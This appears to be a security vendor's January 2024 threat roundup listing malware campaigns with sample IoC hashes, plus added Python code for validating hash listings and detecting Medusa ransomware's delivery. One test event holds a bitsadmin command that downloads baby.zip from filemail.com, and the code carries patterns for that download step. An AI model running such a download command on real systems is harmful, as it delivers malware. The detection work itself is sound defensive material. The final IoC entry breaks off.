Here is the January 2024 breakdown of threats with a short list of IoCs. The full IoC list for each specific threat is available from the Cymulate app.
Reminder: The Cymulate BAS Immediate Threat capabilities can be configured to automatically update your SIEM list of IoCs, including hashes, URLs, domain names, etc.
Note: The period character ‘.’ in the sample file names below has been replaced with a ‘·’ out of an abundance of security caution.
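Every listing below follows one layout: a sample file name that embeds the SHA256 and a scenario tag (_browsing or _edr), then MD5, SHA1 and SHA256 lines. The Python below is an added example written for this page, not Cymulate's code and not the app's export format. It parses that layout, records transcription errors (a digest of the wrong length, a SHA256 line that does not match the hash in the file name), collapses the _browsing/_edr repeats into one hash set, and matches file digests against that set. The record layout is inferred from the listings themselves; SAMPLE_FEED is built from the CherryLoader entries on this page, and BROKEN_FEED is a constructed entry that exists only to exercise the validation path.

```python
"""
Parser, validator and hash matcher for the 'Sample IoCs' listings on this page.
Added example, not Cymulate's code. Layout (inferred from the listings):
  <sha256>_<scenario>XxX<n><Type>·<ext>
  MD5: ...   SHA1: ...   SHA256: ...
where '·' stands in for '.' (see the note above).
"""
import hashlib
import re
from dataclasses import dataclass, field

NAME_RE = re.compile(
    r"^(?P<sha256>[0-9a-fA-F]{64})_(?P<scenario>[a-z]+)XxX(?P<idx>\d+)"
    r"(?P<type>[A-Za-z0-9]+?)[·.](?P<ext>[A-Za-z0-9]+)$"
)
HASH_RE = re.compile(r"^(?P<alg>MD5|SHA1|SHA256):\s*(?P<hex>\S+)$")
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64}
HEX_RE = {alg: re.compile(rf"[0-9a-f]{{{n}}}") for alg, n in HASH_LEN.items()}

# Entries copied from the CherryLoader section of this page; the _edr entry
# repeats the _browsing one exactly as the listings above do.
SAMPLE_FEED = """\
Sample IoCs
50f7f8a8d1bd904ad7430226782d35d649e655974e848ff58d80eafedd377ee9_browsingXxX1Exe·exe
MD5: 03ac133c53c249d6392a104cff70c50f
SHA1: 81852d04bb5bea2a5ee2606d1c9df4165f0a1085
SHA256: 50f7f8a8d1bd904ad7430226782d35d649e655974e848ff58d80eafedd377ee9
438c7ef49fbadd67bf809f7e3e239557e1d18d4c80e42c57f9479a89e3672fd9_browsingXxX10Bat·bat
MD5: 85b1ed8dec41ac515865f5ce635feaba
SHA1: bd7a7cf6ea6da7761646ea865303b67ca3037e8d
SHA256: 438c7ef49fbadd67bf809f7e3e239557e1d18d4c80e42c57f9479a89e3672fd9
438c7ef49fbadd67bf809f7e3e239557e1d18d4c80e42c57f9479a89e3672fd9_edrXxX10Bat·bat
MD5: 85b1ed8dec41ac515865f5ce635feaba
SHA1: bd7a7cf6ea6da7761646ea865303b67ca3037e8d
SHA256: 438c7ef49fbadd67bf809f7e3e239557e1d18d4c80e42c57f9479a89e3672fd9
"""

# Constructed, deliberately broken entry: SHA1 is one hex digit short and the
# SHA256 line disagrees with the hash embedded in the file name.
BROKEN_FEED = """\
00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff_browsingXxX2Dll·dll
MD5: 00112233445566778899aabbccddeeff
SHA1: 00112233445566778899aabbccddeeff0011223
SHA256: ffeeddccbbaa99887766554433221100ffeeddccbbaa99887766554433221100
"""


@dataclass
class Ioc:
    name: str
    scenario: str            # "browsing" or "edr"
    ext: str
    name_sha256: str         # SHA256 embedded in the file name
    hashes: dict = field(default_factory=dict)
    problems: list = field(default_factory=list)

    @property
    def valid(self):
        return not self.problems


def parse_feed(text):
    """Turn a listing into Ioc records; format problems are recorded, not raised."""
    iocs, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line == "Sample IoCs":
            continue
        if m := NAME_RE.match(line):
            cur = Ioc(line, m["scenario"], m["ext"].lower(), m["sha256"].lower())
            iocs.append(cur)
        elif (h := HASH_RE.match(line)) and cur is not None:
            alg, hx = h["alg"], h["hex"].lower()
            if not HEX_RE[alg].fullmatch(hx):
                cur.problems.append(f"{alg} is not {HASH_LEN[alg]} hex digits")
            cur.hashes[alg] = hx
        elif cur is not None:
            cur.problems.append(f"unrecognised line: {line}")
    for ioc in iocs:
        for alg in HASH_LEN:
            if alg not in ioc.hashes:
                ioc.problems.append(f"missing {alg}")
        if ioc.hashes.get("SHA256") not in (None, ioc.name_sha256):
            ioc.problems.append("SHA256 line does not match hash in file name")
    return iocs


def hash_set(iocs):
    """Valid records only, merged across scenarios so _browsing/_edr pairs count once."""
    out = {alg: set() for alg in HASH_LEN}
    for ioc in iocs:
        if ioc.valid:
            for alg, hx in ioc.hashes.items():
                out[alg].add(hx)
    return out


def digests_of(data: bytes):
    return {"MD5": hashlib.md5(data).hexdigest(),
            "SHA1": hashlib.sha1(data).hexdigest(),
            "SHA256": hashlib.sha256(data).hexdigest()}


def matches(digests, hashes):
    """Algorithms under which the digests hit the IoC set (empty list = no match)."""
    return [alg for alg, hx in digests.items() if hx.lower() in hashes.get(alg, ())]


def scan_file(path, hashes):
    with open(path, "rb") as fh:
        return matches(digests_of(fh.read()), hashes)


if __name__ == "__main__":
    records = parse_feed(SAMPLE_FEED + BROKEN_FEED)
    for r in records:
        print(r.scenario, r.name[:16], "OK" if r.valid else r.problems)
    print({alg: len(v) for alg, v in hash_set(records).items()})
```

Records with problems are excluded from the hash set on purpose: a mistyped digest that slips into a SIEM watchlist can never match, and silently loading it hides the transcription error. Run scan_file over a directory of interest to check files against the merged set.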
Info Stealing Packages Hidden In PyPI
FortiGuard Labs has identified new variants of the WhiteSnake PE malware targeting Windows users and institutions, and assesses that the same actor may also be carrying out a similar attack through the Python Package Index (PyPI).
Sample IoCs
03a1621af484ff8f5c1797b25426bab656b6731dba43e31fe58fc1f1963d8484_browsingXxX1Exe·exe
MD5: a7705bd4f706a10bc301f126363c329e
SHA1: aae3eef0e7e98d7ca74b3a9feebd50ddfa9e87c2
SHA256: 03a1621af484ff8f5c1797b25426bab656b6731dba43e31fe58fc1f1963d8484
2b617277fc551b7500867ee009a0f80cbe6d5ee729bdfbf9b4f9d52164811082_browsingXxX5Exe·exe
MD5: 1b7f78233f9f5fc354c60ed4c3c925e2
SHA1: f15863f7ae387a8fe5496d1bc833dad526ad38b6
SHA256: 2b617277fc551b7500867ee009a0f80cbe6d5ee729bdfbf9b4f9d52164811082
34e5bd67fbd9a7040dca9cae90e36013aaeda1940bb39e7fcd5d5fa9c85cadc8_browsingXxX6Exe·exe
MD5: 0a32e2ec770c67261df3f3971d517bea
SHA1: 4dfbe7f3faa5b30b9f93085572496f055b02c5e0
SHA256: 34e5bd67fbd9a7040dca9cae90e36013aaeda1940bb39e7fcd5d5fa9c85cadc8
CherryLoader: A New Go-based Loader Discovered in Recent Intrusions
Arctic Wolf Labs has been tracking two recent intrusions in which threat actors leveraged a new Go-based malware downloader, which Arctic Wolf calls CherryLoader, that allowed them to swap exploits without recompiling code. The loader's icon and name masqueraded as the legitimate CherryTree note-taking application to trick victims. In the intrusions investigated, CherryLoader was used to drop one of two privilege escalation tools, PrintSpoofer or JuicyPotatoNG, which would then run a batch file to establish persistence on the victim device.
Sample IoCs
50f7f8a8d1bd904ad7430226782d35d649e655974e848ff58d80eafedd377ee9_browsingXxX1Exe·exe
MD5: 03ac133c53c249d6392a104cff70c50f
SHA1: 81852d04bb5bea2a5ee2606d1c9df4165f0a1085
SHA256: 50f7f8a8d1bd904ad7430226782d35d649e655974e848ff58d80eafedd377ee9
8c42321dd19bf4c8d2ef11885664e79b0064194e3222d73f00f4a1d67672f7fc_browsingXxX3Exe·exe
MD5: aee80cf052be5aa6b7af312b1b168ddf
SHA1: 0573e10886b3fd1c9d6f0e2eec4a00a7db02a931
SHA256: 8c42321dd19bf4c8d2ef11885664e79b0064194e3222d73f00f4a1d67672f7fc
438c7ef49fbadd67bf809f7e3e239557e1d18d4c80e42c57f9479a89e3672fd9_browsingXxX10Bat·bat
MD5: 85b1ed8dec41ac515865f5ce635feaba
SHA1: bd7a7cf6ea6da7761646ea865303b67ca3037e8d
SHA256: 438c7ef49fbadd67bf809f7e3e239557e1d18d4c80e42c57f9479a89e3672fd9
Kasseika Ransomware Deploys BYOVD Attacks, Abuses PsExec and Exploits Martini Driver
Following an increase in bring-your-own-vulnerable-driver (BYOVD) attacks launched by ransomware groups in 2023, Kasseika is among the latest ransomware operations to take part in the trend. Kasseika joins Akira, BlackByte and AvosLocker in using the tactic, which allows threat actors to terminate antivirus processes and services ahead of deploying ransomware.
In the case investigated, the Kasseika ransomware abused the Martini driver to terminate the victim machine's antivirus-related processes.
Sample IoCs
22f8fa1b42e487f6f6d6c6a62bba65267e2d292f80989031f8529558c86a9119_browsingXxX17Exe·exe
MD5: e0bac7cc1e2b02dda06b8a09f07abee6
SHA1: e7bf904f19581c7eebbbe06f997c3b3f7c1b7739
SHA256: 22f8fa1b42e487f6f6d6c6a62bba65267e2d292f80989031f8529558c86a9119
ae635a4dd36a2bf7047b6a63605a9d20aae4bcc313d93068e5e0b6676a32a39f_browsingXxX18Exe·exe
MD5: c98a5a4bfd53c87c5aac5659f7f505c1
SHA1: 82110672dbde14a73aca43e15e4c85291fe1606f
SHA256: ae635a4dd36a2bf7047b6a63605a9d20aae4bcc313d93068e5e0b6676a32a39f
8a0cd4fb3542458849e20c547a684578dd7fdd4317021dacf5517f607f8ceea7_browsingXxX19Bat·bat
MD5: fdc816fb3d92e02c75f65b1372861f27
SHA1: 78f86e7248492797101cb8e922f1f5e7f542d99f
SHA256: 8a0cd4fb3542458849e20c547a684578dd7fdd4317021dacf5517f607f8ceea7
Cactus Ransomware
On January 20th, the Cactus ransomware group attacked a number of victims across varying industries. The attacks were disclosed on the group's leak site along with the accompanying victim data.
The ransomware group has routinely put pressure on victims by releasing personal information about the victim organization's employees; this has included drivers' licenses, passports, pictures and other personal identification.
Sample IoCs
9ec6d3bc07743d96b723174379620dd56c167c58a1e04dbfb7a392319647441a_browsingXxX73Exe·exe
MD5: 5737cb3a9a6d22e957cf747986eeb1b3
SHA1: 11a93a6c270d6d189fa857f03a001b347a679654
SHA256: 9ec6d3bc07743d96b723174379620dd56c167c58a1e04dbfb7a392319647441a
c49b4faa6ac7b5c207410ed1e86d0f21c00f47a78c531a0a736266c436cc1c0a_browsingXxX74Exe·exe
MD5: ef6a62e5ef88cdcc946e8edafe7a2184
SHA1: ceef6e8328be6b859ee9ba9e5cb194ad12c9483c
SHA256: c49b4faa6ac7b5c207410ed1e86d0f21c00f47a78c531a0a736266c436cc1c0a
9ec6d3bc07743d96b723174379620dd56c167c58a1e04dbfb7a392319647441a_edrXxX73Exe·exe
MD5: 5737cb3a9a6d22e957cf747986eeb1b3
SHA1: 11a93a6c270d6d189fa857f03a001b347a679654
SHA256: 9ec6d3bc07743d96b723174379620dd56c167c58a1e04dbfb7a392319647441a
TeamCity Intrusion Saga: APT29 Suspected Among the Attackers Exploiting CVE-2023-42793
On September 6, 2023, researchers from Sonar discovered a critical vulnerability (CVE-2023-42793) in TeamCity On-Premises. TeamCity is a build management and continuous integration server from JetBrains. On September 27, 2023, a public exploit for this vulnerability was released by Rapid7. The vulnerability was given a CVSS score of 9.8, most likely because an attacker can use the publicly available exploit without authentication to achieve remote code execution on the victim server with a basic web request to any reachable web server hosting the vulnerable application. The vulnerability has been observed being actively exploited in the wild and was added to CISA's Known Exploited Vulnerabilities Catalog on October 4, 2023.
Sample IoCs
ebe231c90fad02590fc56d5840acc63b90312b0e2fee7da3c7606027ed92600e_browsingXxX84Dll·dll
MD5: 23448eba3f5f7267b810080bcb04110f
SHA1: 5ce062f210e1a5026cb53e9949865312ee477e3c
SHA256: ebe231c90fad02590fc56d5840acc63b90312b0e2fee7da3c7606027ed92600e
7b666b978dbbe7c032cef19a90993e8e4922b743ee839632bfa6d99314ea6c53_browsingXxX86Dll·dll
MD5: 2f383f7785f187c93f62fda035ffe587
SHA1: 3a32e516c037c37f7bf83171e167511ba53870a7
SHA256: 7b666b978dbbe7c032cef19a90993e8e4922b743ee839632bfa6d99314ea6c53
4ee70128c70d646c5c2a9a17ad05949cb1fbf1043e9d671998812b2dce75cf0f_browsingXxX87Zip·zip
MD5: 5a782bc5f0d63540b666f6a07e116d81
SHA1: 281bb0dadc789b89f7ae30d5f4bdeae57c66b0e1
SHA256: 4ee70128c70d646c5c2a9a17ad05949cb1fbf1043e9d671998812b2dce75cf0f
Enter The Gates: An Analysis of the DarkGate AutoIt Loader
DarkGate is a malware family delivered through compiled AutoIt loaders, and it poses a significant threat due to its sophisticated evasion techniques and its persistence within compromised systems.
The malware employs multi-stage payloads and leverages obfuscated AutoIt scripting, complicating its identification through traditional signature-based methods. Its ability to exfiltrate sensitive data and establish command-and-control communications demands vigilant detection and analysis.
Sample IoCs
8b6c6c007efa8e1a7da241564142f8a8a934dcce451c7e522cdd86292e81ead7_browsingXxX89Msi·msi
MD5: 1170e2b02b92895d9db0be336d032d90
SHA1: 18f49619d69b057e81163bdf08eab5f355ce662c
SHA256: 8b6c6c007efa8e1a7da241564142f8a8a934dcce451c7e522cdd86292e81ead7
7a92489050089498d6ec05fb7bdfad37da13bb965023d126c41789c5756e4e02_browsingXxX90Msi·msi
MD5: a0e0687c1f4e8f50243db910ebf2e623
SHA1: 72629d1d68dbfb601cc8390d642ad7a1289fb946
SHA256: 7a92489050089498d6ec05fb7bdfad37da13bb965023d126c41789c5756e4e02
7257b4ccec0ceb27b6fb141ce12c8dfb8a401d3edfaeca12699561eccda5a23e_browsingXxX91Pdf·pdf
MD5: 22ae72dd478b95daf3a8ac8c5216ceac
SHA1: 461b54ab5fcfc6f79ace57f76b9645b67bc500bb
SHA256: 7257b4ccec0ceb27b6fb141ce12c8dfb8a401d3edfaeca12699561eccda5a23e
Zloader: No Longer Silent in the Night
After an almost two-year hiatus, Zloader reemerged with a new iteration that appears to have started development in September 2023. The changes include new obfuscation techniques, an updated domain generation algorithm (DGA), RSA encryption for network communications, and native loader support for 64-bit versions of Windows.
Sample IoCs
038487af6226adef21a29f3d31baf3c809140fcb408191da8bc457b6721e3a55_browsingXxX74Exe·exe
MD5: a58aaa24f417bee90ff01865d81866c5
SHA1: 053849d280c4eadcc1d8d2b6fccc821b0ccd2f4e
SHA256: 038487af6226adef21a29f3d31baf3c809140fcb408191da8bc457b6721e3a55
16af920dd49010cf297b03a732749bb99cc34996f090cb1e4f16285f5b69ee7d_browsingXxX75Exe·exe
MD5: 71c72ad0da3af2fca53a729ef977f344
SHA1: 7ace68f544299d8195eabc3e3f71e548eca51e47
SHA256: 16af920dd49010cf297b03a732749bb99cc34996f090cb1e4f16285f5b69ee7d
25c8f98b79cf0bfc00221a33d714fac51490d840d13ab9ba4f6751a58d55c78d_browsingXxX76Exe·exe
MD5: 2f6fcc4884dfa21ee48e463a7a1963f5
SHA1: 2090c12960dee091681a7a3d334d54f2dd6d0bf2
SHA256: 25c8f98b79cf0bfc00221a33d714fac51490d840d13ab9ba4f6751a58d55c78d
Surfing the Tidal Waves of HR-Themed Spam Emails
Fraudsters are posing as HR representatives and sending malicious emails with links that lead to phishing sites or attachments that download malware. Over the past six months, researchers have seen a notable increase in HR-themed malicious spam, which is expected to continue.
Sample IoCs
6d882194b19099750bcc83c0df6acffc06d020d8937ad9cd6136913e0c6dc089_browsingXxX10Vbe·vbe
MD5: 67b7b52e818256c024ba7704f5e1fc8d
SHA1: 5cd4d3df766ba529d158f4f73729c26428a63261
SHA256: 6d882194b19099750bcc83c0df6acffc06d020d8937ad9cd6136913e0c6dc089
dc19c7c20d6dc9f157905de4739e7d83954ba1594dae95cc000d8b523b2e53ec_browsingXxX117z·7z
MD5: c8c95a6a387113ef7117097bdc75b6e8
SHA1: 15599559dd5c4c76d0eeca3277a45260f8a52662
SHA256: dc19c7c20d6dc9f157905de4739e7d83954ba1594dae95cc000d8b523b2e53ec
6d882194b19099750bcc83c0df6acffc06d020d8937ad9cd6136913e0c6dc089_edrXxX10Vbe·vbe
MD5: 67b7b52e818256c024ba7704f5e1fc8d
SHA1: 5cd4d3df766ba529d158f4f73729c26428a63261
SHA256: 6d882194b19099750bcc83c0df6acffc06d020d8937ad9cd6136913e0c6dc089
LockBit Ransomware Distributed Via Word Files Disguised as Resumes
AhnLab Security Intelligence Center (ASEC) has identified that LockBit ransomware has been distributed via Word files since last month.
Sample IoCs
2505d5a0b391150f5aa6e18e0375ea8ef4d022840ecd499ca4b6b487a6e86de2_browsingXxX1Docx·docx
MD5: 11a65e914f9bed73946f057f6e6aa347
SHA1: 3d0a20cd4c99c3f08a405fd57cebfde48d7a2923
SHA256: 2505d5a0b391150f5aa6e18e0375ea8ef4d022840ecd499ca4b6b487a6e86de2
35ee311e2e4b1966d3964a61f8e05cd9b6b0e605dd34e64e6ad5d8c53bba908a_browsingXxX2Docx·docx
MD5: 16814dffbcaf12ccb579d5c59e151d16
SHA1: 6da093d9d87593496af83967dd97e2975a945ba6
SHA256: 35ee311e2e4b1966d3964a61f8e05cd9b6b0e605dd34e64e6ad5d8c53bba908a
957baea98c48a7e8f620b6ad869113eacbc4f14c73e03bf5f9dbc75881e22aed_browsingXxX3Docx·docx
MD5: 1b95af49b05953920dbfe8b042db9285
SHA1: 57324c29bd4ece81b9578972d5a4a47bcf8cf408
SHA256: 957baea98c48a7e8f620b6ad869113eacbc4f14c73e03bf5f9dbc75881e22aed
From Russia With Code: Disarming Atomic Stealer
The latest version of Atomic Stealer is circulating on the Internet and has been described by security researcher Jérôme Segura as one of the most sophisticated tools in the world. For $3,000 per month the buyer gets access to the panel: the buyer provides a Telegram bot ID and a build ID to the seller and receives the build.
Sample IoCs
339ac8f76d26a01d1d79c4dbe3e17b27dbba6a8a8ee3c277768017486e9db030_browsingXxX241Macho·mach
MD5: 57db36e87549de5cfdada568e0d86bff
SHA1: b8352f14d2b79dc865dd7ae60d47d901847f0f35
SHA256: 339ac8f76d26a01d1d79c4dbe3e17b27dbba6a8a8ee3c277768017486e9db030
589dbb3f678511825c310447b6aece312a4471394b3bc40dde6c75623fc108c0_browsingXxX242Macho·macho
MD5: bf7512021dbdce0bd111f7ef1aa615d5
SHA1: ea8b0d95924605292f994810103ee95b9cc37914
SHA256: 589dbb3f678511825c310447b6aece312a4471394b3bc40dde6c75623fc108c0
bd8adfae24dc7a6b633d3b5342d11978e6b7418fa43be6eca0378f17d0bb7565_browsingXxX243Macho·macho
MD5: dd8aa38c7f06cb1c12a4d2c0927b6107
SHA1: 863c0fbc1efccbef4c2df82920ded53181096d8e
SHA256: bd8adfae24dc7a6b633d3b5342d11978e6b7418fa43be6eca0378f17d0bb7565
Ivanti Connect Secure VPN Exploitation: New Observations
Analysis of Ivanti Connect Secure VPN appliances from January 2023 to January 18, 2024, has revealed a number of new discoveries and new ways in which the vulnerabilities are being exploited.
Sample IoCs
39ead6055306739ab969a3531bde2050f556b05e500894b3cda120178f2773be_browsingXxX110So·so
MD5: 001dfa92e6239c3dda0935634c1e20d1
SHA1: f9a33d6c1798523248a88d6b45215001cbae3441
SHA256: 39ead6055306739ab969a3531bde2050f556b05e500894b3cda120178f2773be
816754f6eaf72d2e9c69fe09dcbe50576f7a052a1a450c2a19f01f57a6e13c17_browsingXxX111So·so
MD5: 63b0574cbe77d6231513f32e0d042484
SHA1: 55c2197c88cd3cef23b5f9062c6bdbb6f4b28094
SHA256: 816754f6eaf72d2e9c69fe09dcbe50576f7a052a1a450c2a19f01f57a6e13c17
45c9578bbceb2ce2b0f10133d2f3f708e78c8b7eb3c52ad69d686e822f9aa65f_browsingXxX116Json·json
MD5: f861461b3b29a9eb97750b1b0af6e9de
SHA1: 02fe1d807c689072914ce43d894d2b70e0207639
SHA256: 45c9578bbceb2ce2b0f10133d2f3f708e78c8b7eb3c52ad69d686e822f9aa65f
A Victim of Mallox Ransomware
In a blog post, researchers share insights into the tactics and procedures the Mallox ransomware threat actor uses to extort money from victims.
Sample IoCs
0e05b8d0a88660c00510abde3aade43291e774880ed001e3a88dbb753dcb6f52_browsingXxX58Bat·bat
MD5: 6055dd496a062d452e9f64f0a24ae9e3
SHA1: 6aa2d53b0d25eb6ae0d91ead04c7d5de5997438a
SHA256: 0e05b8d0a88660c00510abde3aade43291e774880ed001e3a88dbb753dcb6f52
572d88c419c6ae75aeb784ceab327d040cb589903d6285bbffa77338111af14b_browsingXxX56Exe·exe
MD5: bb7c575e798ff5243b5014777253635d
SHA1: 2146f04728fe93c393a74331b76799ea8fe0269f
SHA256: 572d88c419c6ae75aeb784ceab327d040cb589903d6285bbffa77338111af14b
0e05b8d0a88660c00510abde3aade43291e774880ed001e3a88dbb753dcb6f52_edrXxX58Bat·bat
MD5: 6055dd496a062d452e9f64f0a24ae9e3
SHA1: 6aa2d53b0d25eb6ae0d91ead04c7d5de5997438a
SHA256: 0e05b8d0a88660c00510abde3aade43291e774880ed001e3a88dbb753dcb6f52
Kuiper Ransomware's Evolution
The Kuiper ransomware, developed in Golang, is presented as an opportunity for criminals to profit by extorting one or more targets. The actor RobinHood offers assistance with operations in exchange for a percentage of the victims' payments. Despite an initially promising advertisement highlighting technical capabilities, the reality reveals that the actor may have overestimated their abilities. Stairwell's Silas Cutler's blog exposes the actor's setbacks, including the exposure of a server copy holding the ransomware's source code and decryption keys.
Sample IoCs
df430ab9f5084a3e62a6c97c6c6279f2461618f038832305057c51b441c648d9_browsingXxX5Exe·exe
MD5: 84820f3eb491a2fde1f52435cd29646c
SHA1: 8c6e135495fcf8898de62e6793e3cd06d3025461
SHA256: df430ab9f5084a3e62a6c97c6c6279f2461618f038832305057c51b441c648d9
0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985_browsingXxX11Exe·exe
MD5: 0608c64c57dcc09246be00f0b2767e6e
SHA1: 02642663bfc7be0c06051f4b01c9861102c71850
SHA256: 0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985
998347d4ba21661688169337ca4ea2a6118c2fad2005d39d8bf46c0bcf46af5a_browsingXxX7Elf·elf
MD5: 8c3c50ecee8744ad77a517ed39a25880
SHA1: 27abd80487784e41d2dd7eee9efd5b8b01712ec7
SHA256: 998347d4ba21661688169337ca4ea2a6118c2fad2005d39d8bf46c0bcf46af5a
US-CERT Alert – Known Indicators of Compromise Associated with Androxgh0st Malware
Androxgh0st malware has been observed establishing a botnet for victim identification and exploitation in target networks.
Sample IoCs
0df17ad20bf796ed549c240856ac2bf9ceb19f21a8cae2dbd7d99369ecd317ef_browsingXxX1Php·php
MD5: 95f745a5db131b1ca34e44848fd52edb
SHA1: 5fae94432540ade68eabce94140c9a5be153b3c8
SHA256: 0df17ad20bf796ed549c240856ac2bf9ceb19f21a8cae2dbd7d99369ecd317ef
59e90be75e51c86b4b9b69dcede2cf815da5a79f7e05cac27c95ec35294151f4_browsingXxX3Html·html
MD5: 1fb78440dc44b0900b27260a16d9771e
SHA1: 452ec481734a78597b928e29c834d0e43fb2c7e2
SHA256: 59e90be75e51c86b4b9b69dcede2cf815da5a79f7e05cac27c95ec35294151f4
https://www.virustotal.com/gui/file/1fb78440dc44b0900b27260a16d9771e/detection
23fc51fde90d98daee27499a7ff94065f7ed4ac09c22867ebd9199e025dee066_browsingXxX2So·so
MD5: 62a06bea8c6e276b5e532944cfc863e5
SHA1: 09bd9b17a64b20ba66582dbc3ce08169697177a8
SHA256: 23fc51fde90d98daee27499a7ff94065f7ed4ac09c22867ebd9199e025dee066
Rimasuta: New Variant Switches to ChaCha20 Encryption Algorithm
A new variant of the Mirai-based malware known as Rimasuta has recently resurfaced in samples captured by 360netlab in Japan, and it has undergone a significant change in its encryption algorithm.
Sample IoCs
40bbd8113863f62f6bba3c7d6a93ad96062891b53fc79d027109c12d1acfaccb_browsingXxX11Elf·elf
MD5: cb19cd9472032c2dd5985f699e48188e
SHA1: 9352740811729cbac88116b2e2a92833c9bee4a2
SHA256: 40bbd8113863f62f6bba3c7d6a93ad96062891b53fc79d027109c12d1acfaccb
272731119f7b60979edbd0abc939e8156988d9fd58be24b5a47964e7e5ad3ca2_browsingXxX10Elf·elf
MD5: cc1c4ca4c1b98fc0aabac0c35d478c4a
SHA1: 8e1beb77b33497d5d8076ebdb68e5ac002cca7c3
SHA256: 272731119f7b60979edbd0abc939e8156988d9fd58be24b5a47964e7e5ad3ca2
272731119f7b60979edbd0abc939e8156988d9fd58be24b5a47964e7e5ad3ca2_edrXxX10Elf·elf
MD5: cc1c4ca4c1b98fc0aabac0c35d478c4a
SHA1: 8e1beb77b33497d5d8076ebdb68e5ac002cca7c3
SHA256: 272731119f7b60979edbd0abc939e8156988d9fd58be24b5a47964e7e5ad3ca2
CVE-2023-36025 Exploited for Defense Evasion in Phemedrone Stealer Campaign
Trend Micro covers the Phemedrone Stealer campaign's exploitation of CVE-2023-36025, the Windows Defender SmartScreen bypass vulnerability, for defense evasion, and investigates the malware's payload.
Sample IoCs
1433efd142007ce809aff5b057810f5a1919ea1e3ff740ff0fcc2fc729226be5_browsingXxX42Ini·ini
MD5: 65367d9e4f93700cdeab9af35559220e
SHA1: 0a6f7c08ccdadbc07e25957693846c06eaa1b093
SHA256: 1433efd142007ce809aff5b057810f5a1919ea1e3ff740ff0fcc2fc729226be5
4ae28a44c38edc516e449ddd269b5aa9924d549d763773dcd312b48fe6bb91ab_browsingXxX54Ini·ini
MD5: b6627a1ba0ff5b3352990518bda0f2d5
SHA1: 0847210bde9109b855a313ba4cf8f38a8a2c07d2
SHA256: 4ae28a44c38edc516e449ddd269b5aa9924d549d763773dcd312b48fe6bb91ab
c6765d92e540af845b3cbc4caa4f9e9d00d5003a36c9cb548ea79bb14c7e8f66_browsingXxX36Dll·dll
MD5: b042b2a8981a94b7afe680d94808e9f8
SHA1: 52e8602e9137b2e02802512be143bb537cb8d56e
SHA256: c6765d92e540af845b3cbc4caa4f9e9d00d5003a36c9cb548ea79bb14c7e8f66
Medusa Ransomware Continues To Infect Devices Worldwide
In 2023, the Medusa ransomware targeted devices across various sectors.
The operators exploited Microsoft Exchange servers by uploading a webshell similar to previously reported ASPX files. PowerShell was then used to run a bitsadmin transfer from the file-hosting site filemail[.]com, downloading a ZIP-compressed file named baby.zip. Upon decompression and execution, this file installed ConnectWise remote monitoring and management (RMM) software.
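A detection for the delivery step just described, as an added example rather than Trend Micro's or Cymulate's code: it inspects process-creation events shaped like Sysmon Event ID 1 fields for bitsadmin /transfer launched from PowerShell or the IIS worker process, with a URL on filemail[.]com or a baby.zip file name. The event records, the field names and the suspicious-parent list are assumptions made for the example; the watched host and file name come from the paragraph above.

```python
"""
Detection for the Medusa delivery step described above: bitsadmin used as a
downloader from filemail[.]com to fetch baby.zip, launched via PowerShell after
an Exchange webshell. Added example, not Trend Micro's or Cymulate's code.
Events are constructed dicts with Sysmon Event ID 1 style field names.
"""
import re
from urllib.parse import urlparse

# Taken from the description above; extend with your own intelligence.
WATCHED_HOSTS = {"filemail.com"}
WATCHED_NAMES = {"baby.zip"}
# Assumed parent list: the text names PowerShell as the launcher, and a webshell
# on Exchange runs under the IIS worker process.
SUSPICIOUS_PARENTS = {"powershell.exe", "pwsh.exe", "w3wp.exe"}

BITS_TRANSFER = re.compile(r"\bbitsadmin(?:\.exe)?\b.*\s/transfer\b", re.I)
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {   # matches the chain in the text
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "Image": r"C:\Windows\System32\bitsadmin.exe",
        "CommandLine": r"bitsadmin /transfer job1 /download /priority normal "
                       r"https://www.filemail.com/d/abc123/baby.zip C:\Users\Public\baby.zip",
    },
    {   # benign admin use from an interactive shell, internal host
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\bitsadmin.exe",
        "CommandLine": r"bitsadmin /transfer patch /download /priority high "
                       r"http://wsus.corp.example/updates/kb.msu C:\Temp\kb.msu",
    },
    {   # unrelated process
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Program Files\Notepad++\notepad++.exe",
        "CommandLine": r'"C:\Program Files\Notepad++\notepad++.exe" notes.txt',
    },
]


def _basename(path):
    """Last path component, Windows or URL style, unquoted and lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()


def _watched_host(host):
    return any(host == w or host.endswith("." + w) for w in WATCHED_HOSTS)


def analyse_event(ev):
    """Reasons the event matches the described chain; empty list means no finding."""
    cmd = ev.get("CommandLine", "")
    if not BITS_TRANSFER.search(cmd):
        return []
    reasons = []
    parent = _basename(ev.get("ParentImage", ""))
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"bitsadmin /transfer spawned by {parent}")
    for url in URL_RE.findall(cmd):
        parts = urlparse(url)
        host = (parts.hostname or "").lower()
        if _watched_host(host):
            reasons.append(f"download from watched host {host}")
        if _basename(parts.path) in WATCHED_NAMES:
            reasons.append(f"watched file name {_basename(parts.path)}")
    # The local destination is the last argument of /transfer; check it as well.
    for token in cmd.split():
        if _basename(token) in WATCHED_NAMES:
            reasons.append(f"watched file name {_basename(token)}")
    return list(dict.fromkeys(reasons))  # de-duplicate, keep order


def triage(events):
    """(index, reasons) for every event that produced findings."""
    return [(i, r) for i, ev in enumerate(events) if (r := analyse_event(ev))]


if __name__ == "__main__":
    for idx, why in triage(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["CommandLine"])
        for reason in why:
            print("   -", reason)
```

The second constructed event shows the trade-off: bitsadmin /transfer is a legitimate administrative tool, so the parent-process and destination checks carry the signal; in many environments any bitsadmin download from a server is rare enough to review on its own, in which case drop the parent filter and let the reasons list drive severity.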
Sample IoCs
7d68da8aa78929bb467682ddb080e750ed07cd21b1ee7a9f38cf2810eeb9cb95_browsingXxX77Exe·exe
MD5: e4b7fdabef67a0550877e6439beb093d
